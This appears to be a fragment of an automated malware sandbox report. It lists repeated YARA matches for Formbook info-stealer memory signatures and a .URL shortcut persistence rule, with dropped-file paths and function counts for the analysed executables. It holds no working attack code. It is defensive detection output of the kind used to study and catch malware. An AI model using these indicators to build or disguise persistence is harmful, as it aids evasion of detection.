              Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000003.497233291.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560576590.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497427116.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583748218.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560966486.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000003.584057831.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561221425.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.562432544.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584430165.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497196939.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497027305.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000003.583809882.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561955738.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583259344.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583847406.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.496929665.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000003.583317580.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000003.583980388.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000003.497250611.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583904644.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560450286.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497289431.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560538390.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.562142811.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497089082.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.562245816.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583483116.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497109502.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584129270.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583705715.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584336021.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560383083.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561149693.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561547476.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497453789.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000003.583441882.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584088819.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497486545.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000003.584234578.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584506071.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560320590.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497066247.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497151468.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497352648.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497402362.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497007493.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497047805.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000003.497310666.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497216692.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561741705.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583353394.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.496970511.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497375359.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561654798.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560760985.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583951721.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560713668.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497129768.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497173543.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560263078.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.496988721.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584197318.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000003.583532798.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584010373.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560188388.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.496950369.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583656067.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583176269.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497333632.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561086888.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561847558.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583592654.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561433212.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560491541.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: Process Memory Space: Odhbljup.exe PID: 2192, type: MEMORYSTRMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Users\user\pujlbhdO.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Users\Public\vbc.exeCode function: String function: 004042E4 appears 81 times
              Source: C:\Users\Public\vbc.exeCode function: String function: 004067E4 appears 61 times
              Source: C:\Users\user\Odhbljup.exeCode function: String function: 004038F8 appears 44 times
              Source: C:\Users\user\Odhbljup.exeCode function: String function: 004049F0 appears 38 times
              Source: C:\Users\user\Odhbljup.exeCode function: String function: 004042E4 appears 162 times
              Source: C:\Users\user\Odhbljup.exeCode function: String function: 0040E2B4 appears 42 times
              Source: C:\Users\user\Odhbljup.exeCode function: String function: 0040F5BC appears 44 times
              Source: C:\Users\user\Odhbljup.exeCode function: String function: 004067E4 appears 122 times
              Source: C:\Users\user\Odhbljup.exeCode function: String function: 00404308 appears 46 times
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 02013F92 appears 132 times
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0201373B appears 248 times
